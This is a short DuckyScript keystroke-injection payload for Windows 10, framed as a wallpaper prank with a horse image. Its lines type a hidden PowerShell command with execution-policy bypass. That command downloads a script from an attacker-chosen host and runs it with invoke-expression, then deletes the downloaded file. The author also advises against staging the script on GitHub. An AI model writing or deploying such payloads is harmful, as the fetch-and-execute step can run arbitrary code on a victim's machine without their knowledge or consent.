REM Title:         Horsd
REM Author:        MocconaCoffee
REM Description:    A simple script that will change the users wallpaper to Brown Horse that is running.
REM Dedicated to:   This script is a toast to my Nan that passed recently (she pioneered horse backgrounds on her decade-old laptop.)
REM Target OS: Windows 10
REM Required Configurations: Ensure that you have amended changes to the URL with a direct link to the script hosted by your own hosting service. DO NOT use GitHub as a medium for staging the script.
DEFINE #SCRIPTURL example.com

DELAY 3000
GUI r
DELAY 300
STRING powershell
ENTER
DELAY 300
STRING Invoke-WebRequest -Uri https://i.imgur.com/jwstWRR.jpg -OutFile horse.jpg
ENTER
DELAY 100
STRING exit
ENTER
DELAY 1000
GUI r
DELAY 300
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr #SCRIPTURL/horsd.ps1?dl=1; invoke-expression $pl
ENTER
DELAY 1000
GUI r
DELAY 300
STRING powershell
ENTER
DELAY 300
STRING Remove-Item horse.jpg
ENTER
DELAY 300
STRING exit
ENTER
